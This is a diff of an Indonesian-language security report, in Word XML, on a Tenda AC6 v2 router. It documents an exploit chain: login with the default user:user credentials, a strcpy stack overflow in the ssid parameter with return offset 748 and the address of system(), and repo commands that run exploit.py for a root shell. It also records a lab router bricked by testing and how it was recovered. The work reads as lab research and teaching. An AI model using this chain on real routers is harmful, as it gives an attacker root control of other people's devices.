     <w:p>
@@ -18893,7 +20652,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+        <w:pStyle w:val="Heading2"/>
       </w:pPr>
       <w:r>
         <w:t>6. Cara Menjalankan Ulang (Reproduce)</w:t>
@@ -18963,7 +20722,6 @@
     <w:p/>
     <w:p/>
     <w:p/>
-    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -18973,9 +20731,9 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="888888"/>
-          <w:sz w:val="32"/>
-        </w:rPr>
-        <w:t>BAGIAN VIII</w:t>
+          <w:sz w:val="44"/>
+        </w:rPr>
+        <w:t>BAGIAN X</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18987,9 +20745,14 @@
         <w:rPr>
           <w:b/>
           <w:color w:val="0B3D91"/>
-          <w:sz w:val="48"/>
-        </w:rPr>
-        <w:t>Uji di Perangkat Asli, Batas Panjang ssid, Brick &amp; Pemulihan</w:t>
+          <w:sz w:val="52"/>
+        </w:rPr>
+        <w:t>Reproduksi &amp; Verifikasi (Repo)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:br w:type="page"/>
       </w:r>
     </w:p>
     <w:p>
@@ -18997,25 +20760,12 @@
         <w:pStyle w:val="Heading1"/>
       </w:pPr>
       <w:r>
-        <w:t>Lampiran 4 — Uji di Perangkat Asli, Analisis Panjang ssid, Brick &amp; Pemulihan</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Bagian ini mencatat uji langsung pada perangkat lab (router sendiri), hasilnya, kesalahan yang terjadi (perangkat sempat tidak boot), serta prosedur pemulihannya. Data pribadi diredaksi. Ditulis apa adanya sebagai pelajaran metodologi: pembuktian eksploit WAJIB di emulasi/isolasi dulu.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>1. Ringkasan Satu Halaman</w:t>
+        <w:t>Reproduksi &amp; Verifikasi</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Seluruh rantai (recon -&gt; backdoor -&gt; login/token -&gt; overflow -&gt; root shell) dapat direproduksi dari repo: https://github.com/farrelfaiziaulhaq/tenda-ac6-rce</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19023,7 +20773,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Target uji: router Tenda AC6 v2 (RTL8197F, firmware V15.03.06.51_multi), LAN 192.168.0.1.</w:t>
+        <w:t>git clone https://github.com/farrelfaiziaulhaq/tenda-ac6-rce.git</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19031,7 +20781,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Primitif yang diuji: stack overflow pada parameter `ssid` endpoint /goform/fast_setting_wifi_set; saved $ra di fp+892 → offset 748 (via strcpy ke fp+0x90); target $ra = system @ 0x005047c0.</w:t>
+        <w:t>cd tenda-ac6-rce &amp;&amp; ./bootstrap.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19039,7 +20789,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Hasil: overflow TIDAK pernah tercapai di perangkat asli. Handler justru menulis config/CFG dengan `ssid` panjang tak valid (≤500 byte dijawab `{"errCode":0}`), lalu koneksi drop (`http=000`) saat `ssid` ≥600 byte.</w:t>
+        <w:t>docker exec firmae-run bash /repo/emulator/setup_emulator.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19047,7 +20797,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Akibat: CFG rusak → perangkat gagal membawa LAN/WiFi saat boot (perangkat tampak 'mati').</w:t>
+        <w:t>./emulator/reboot_guest.sh   # tunggu httpd=302</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19055,7 +20805,20 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Pemulihan: Emergency/Recovery Web Mode (bootloader) + firmware resmi Tenda; alternatif TFTP/UART.</w:t>
+        <w:t>python3 exploit/exploit.py   # -&gt; ROOT SHELL di 172.17.0.2:2323</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Verifikasi clean-room: httpd melayani (302); eksploit -&gt; root shell; uname -&gt; Linux 4.1.17+ mips; /etc/passwd -&gt; root::0:0.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Celah asli vs harness emulasi (jujur)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19063,58 +20826,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Pelajaran: untuk eksploit memori, gunakan emulasi/harness lebih dulu; jangan pernah mengirim payload ke perangkat produksi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>2. Recon Perangkat Asli</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Perangkat merespons normal sebelum uji (ping 0% loss, /login.html 200). Autentikasi dapat dilewati dengan kredensial dasar `user:user`:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>$ curl -si -d 'username=user&amp;password=user' http://192.168.0.1/login/Auth</w:t>
-        <w:br/>
-        <w:t>HTTP/1.0 302 Redirect</w:t>
-        <w:br/>
-        <w:t>Set-Cookie: password=&lt;SESSION-TOKEN&gt;; path=/</w:t>
-        <w:br/>
-        <w:t>Location: http://192.168.0.1/main.html</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Cookie sesi valid dipakai untuk goform. Uji read-only:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>$ curl -si -H 'Cookie: password=&lt;SESSION-TOKEN&gt;' -X POST \</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">    http://192.168.0.1/goform/getProduct</w:t>
-        <w:br/>
-        <w:t>HTTP/1.1 200 OK</w:t>
-        <w:br/>
-        <w:t>{"product":"f1203","accessType":"1"}</w:t>
-        <w:br/>
-        <w:br/>
-        <w:t># tanpa cookie -&gt; HTTP/1.0 302 Redirect ke login.html (sesi wajib)</w:t>
+        <w:t>Celah asli: overflow strcpy (form_fast_setting_wifi_set) + backdoor user:user dari default config.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19122,50 +20834,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Kesimpulan: sesi user:user benar-benar mengesahkan request goform (bukan sekadar Set-Cookie kosong).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>3. Analisis Handler (disasm bin/httpd)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Fungsi `form_fast_setting_wifi_set` @ 0x00477c20 (fast_setting.c):</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>0x00477d08  lw   a0, arg0(req)</w:t>
-        <w:br/>
-        <w:t>0x00477d10  addiu a1, v0, -0x1180        ; "ssid"</w:t>
-        <w:br/>
-        <w:t>0x00477d24  jalr websGetVar              ; ssid = websGetVar(req,"ssid",&lt;default&gt;)</w:t>
-        <w:br/>
-        <w:t>0x00477d38  lb   v0, 0(v0)</w:t>
-        <w:br/>
-        <w:t>0x00477d3c  bnez v0, 0x477d98            ; non-kosong -&gt; lanjut</w:t>
-        <w:br/>
-        <w:t>0x00477d48  "%s [%d] no ssid set, just return."</w:t>
-        <w:br/>
-        <w:t>0x00477d78  websRedirect(req, "login.html")   ; KOSONG -&gt; redirect login</w:t>
-        <w:br/>
-        <w:br/>
-        <w:t>0x00477d98  strcpy(fp+0x50, ssid)        ; buffer 64 byte</w:t>
-        <w:br/>
-        <w:t>0x00477dbc  strcpy(fp+0x90, ssid)        ; buffer 64 byte (write terakhir)</w:t>
-        <w:br/>
-        <w:t>0x00478698  lw   ra, 892(sp)             ; saved $ra (offset 748 dari fp+0x90)</w:t>
-        <w:br/>
-        <w:t>0x004786a4  jr   ra</w:t>
+        <w:t>Harness emulasi: patch hook epilog/'cave' pada bin/httpd; libapmib.so dipatch (apmib_init -&gt; return 1) agar melewati baca config flash; /cfg/mib.cfg (disanitasi) disediakan.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19173,1467 +20842,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>Syarat masuk ke jalur rentan: parameter `ssid` harus NON-KOSONG.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Offset $ra = 892 - 144 = 748 (strcpy kedua yang menang). Target null-safe 0x005047c0 (system).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>4. Eksperimen Batas Panjang ssid (hasil nyata)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Body hanya berisi `ssid=&lt;N x 'A'&gt;` (tanpa parameter lain), cookie sesi valid, metode POST:</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="LightGrid-Accent1"/>
-        <w:tblW w:type="auto" w:w="0"/>
-        <w:jc w:val="center"/>
-        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="2880"/>
-        <w:gridCol w:w="2880"/>
-        <w:gridCol w:w="2880"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-              </w:rPr>
-              <w:t>Panjang ssid (N)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-              </w:rPr>
-              <w:t>HTTP</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-              </w:rPr>
-              <w:t>Balasan / Catatan</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>64, 128, 200, 255, 256, 300, 400, 500</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>200</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>{"errCode":0} (handler memproses)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>600, 640, 700, 748, 752, 800</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>000</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>tidak ada balasan (koneksi drop / httpd crash)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>PEMBARUAN: offset 748 SUDAH terkonfirmasi dinamis (QEMU gdbstub) dan dipakai pada eksploit final -&gt; root shell.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Uji pendahuluan: `ssid=TESTPROBE` (9 byte) → 200 {"errCode":0}; GET dengan query `?ssid=...` → 302 (handler hanya memproses body POST).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Payload awal kita (`ssid=` + 748×'A' + bytes c0 47 50 + parameter lain) dijawab 302 — kemungkinan karena byte non-ASCII atau penolakan panjang, sehingga handler menganggap ssid kosong.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>5. Apa yang Sebenarnya Terjadi (Root Cause 'Brick')</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Setiap `ssid` panjang yang diterima (≤500 B) ditulis/di-commit ke partisi CFG, bukan sekadar dicoba di buffer stack.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Nilai `ssid` yang panjang/aneh membuat boot berikutnya gagal memuat konfigurasi jaringan (CFM/MIB) → LAN dan WiFi tidak naik; perangkat tampak mati.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Ini BUKAN kerusakan bootloader/firmware: bootloader tetap sehat (dibuktikan dengan masih bisa masuk Emergency Web Mode). Yang rusak hanya data konfigurasi.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:color w:val="555555"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Pelajaran penting: endpoint 'setter' seperti ini memvalidasi/menyimpan input ke NVRAM/CFG, jadi efek sampingnya bisa jauh lebih besar daripada sekadar crash proses.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>6. Prosedur Pemulihan</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>6.1 Emergency / Recovery Web Mode (metode utama)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Cabut daya. Sambungkan PC ke port LAN pakai kabel; set IP statis PC 192.168.0.2 / 255.255.255.0.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Tekan-tahan tombol RESET, lalu colokkan daya sambil tetap ditahan ±10–15 detik sampai semua LED berkedip.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Lepas RESET; tunggu LED port LAN menyala stabil.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Buka browser http://192.168.0.1 (bila perlu coba http://192.168.0.10) → halaman recovery muncul.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Unggah firmware resmi, tunggu selesai. Jangan cabut daya saat proses.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>6.2 Firmware resmi yang disiapkan</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>File : US_AC6V2.0RTL_V15.03.06.52_multi_TDE01.bin  (u-boot legacy uImage, MIPS)</w:t>
-        <w:br/>
-        <w:t>Ukuran: 6,819,906 byte</w:t>
-        <w:br/>
-        <w:t>MD5  : 990011d052e061d842ab9a7007a20b86</w:t>
-        <w:br/>
-        <w:t>SHA256: 8afd50e3cddeb79030759cf73095fb3eb0ec20459f6a67fa419544d3f6e0b3bf</w:t>
-        <w:br/>
-        <w:t>Sumber: static.tenda.com.cn (AC6 v2.0 Firmware_V15.03.06.52)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t>6.3 Alternatif</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>TFTP: set IP PC 192.168.0.2, jalankan TFTP server yang menyajikan .bin, masuk mode recovery seperti di atas.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>UART serial (3.3V TTL): buka casing, sambung USB-TTL ke header GND/TX/RX/VCC, lihat log boot, hentikan bootloader, dan reflash. Metode paling pasti (sekaligus latihan hardware hacking).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>7. Timeline Uji (Ringkas)</w:t>
-      </w:r>
-    </w:p>
-    <w:tbl>
-      <w:tblPr>
-        <w:tblStyle w:val="LightGrid-Accent1"/>
-        <w:tblW w:type="auto" w:w="0"/>
-        <w:jc w:val="center"/>
-        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
-      </w:tblPr>
-      <w:tblGrid>
-        <w:gridCol w:w="2880"/>
-        <w:gridCol w:w="2880"/>
-        <w:gridCol w:w="2880"/>
-      </w:tblGrid>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-              </w:rPr>
-              <w:t>Waktu</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-              </w:rPr>
-              <w:t>Aksi</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-              </w:rPr>
-              <w:t>Hasil</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>T0</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Auth bypass user:user</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Cookie sesi didapat (302 + Set-Cookie)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>T1</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>POST getProduct dengan cookie</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>200 JSON -&gt; sesi sah</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>T2</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>POST ssid=TESTPROBE</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>200 {"errCode":0} (handler menyimpan ssid)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>T3</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Matriks ssid N=64..500</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>200 {"errCode":0}</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>T4</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Matriks ssid N=600..800</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>000 (koneksi drop / httpd crash)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>T5</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Monitor ping 70 dtk</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>tetap UP (yang crash proses httpd, bukan kernel)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>T6</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Setelah beberapa saat / power-cycle</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>LAN+WiFi tidak naik (CFG rusak)</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-      <w:tr>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>T7</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Rencana pemulihan</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:type="dxa" w:w="2880"/>
-          </w:tcPr>
-          <w:p>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="18"/>
-              </w:rPr>
-              <w:t>Emergency Web Mode + firmware resmi</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-      </w:tr>
-    </w:tbl>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
-      </w:pPr>
-      <w:r>
-        <w:t>8. Status Emulasi (Mengapa Ini Penting)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Emulasi firmware (FirmAE/qemu) sempat membuat `bin/httpd` LISTEN di 192.168.0.1:80, tetapi request tidak dilayani karena ketergantungan CFM (Realtek).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
